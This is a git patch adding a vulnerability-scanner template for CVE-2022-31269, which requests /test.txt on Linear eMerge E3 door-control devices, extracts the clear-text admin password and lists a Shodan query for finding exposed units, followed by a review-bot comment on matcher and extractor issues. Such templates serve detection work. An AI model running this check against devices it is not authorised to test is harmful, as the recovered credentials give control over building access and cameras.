From 7b48166c29fcdb6ae0b14b8fd6392301d846ab2d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?=E6=9E=97=E5=AF=92?= <57119052+For3stCo1d@users.noreply.github.com>
Date: Thu, 11 Aug 2022 13:26:52 +0800
Subject: [PATCH] Create CVE-2022-31269.yaml
---
cves/2022/CVE-2022-31269.yaml | 41 +++++++++++++++++++++++++++++++++++
1 file changed, 41 insertions(+)
create mode 100644 cves/2022/CVE-2022-31269.yaml
diff --git a/cves/2022/CVE-2022-31269.yaml b/cves/2022/CVE-2022-31269.yaml
new file mode 100644
index 0000000000..d1261846b8
--- /dev/null
+++ b/cves/2022/CVE-2022-31269.yaml
@@ -0,0 +1,41 @@
+id: CVE-2022-31269
+
+info:
+ name: eMerge E3-Series - Information Disclosure
+ author: For3stCo1d
+ severity: high
+ description: |
+ Admin credentials are stored in clear text at the endpoint /test.txt (This occurs in situations where the default credentials admin:admin have beenchanged.) Allows an unauthenticated attacker to obtain adminicredentials, access the admin dashboard of Linear eMerge E3-Series devices, control entire building doors, cameras, elevator, etc... and access information about employees who can access the building and take control of the entire building.
+ reference:
+ - https://packetstormsecurity.com/files/167990/Nortek-Linear-eMerge-E3-Series-Credential-Disclosure.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2022-31269
+ metadata:
+ shodan-query: http.title:"Linear eMerge"
+ tags: cve,cve2022,emerge,exposure
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/test.txt"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "ID="
+ - "Password="
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - text/plain
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ regex:
+ - Password='(.+?)'
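Review bot: The first `type: word` matcher keys on the bare strings `ID=` and `Password=`, which any plain-text file served at `/test.txt` could contain, while the extractor regex expects the quoted form `Password='…'`. Aligning the matcher with the extractor, e.g. `- "Password='"`, would reduce false positives, assuming the quoted form is what affected devices actually return. The `extractors` block also copies the recovered admin password into scan output in clear text, so results from this template need to be stored and shared as secrets; dropping the block would keep detection without capturing the credential. Separately, `info` has no `classification` entry (`cve-id: CVE-2022-31269`) or `remediation` text, and the description contains the typos `beenchanged` and `adminicredentials`.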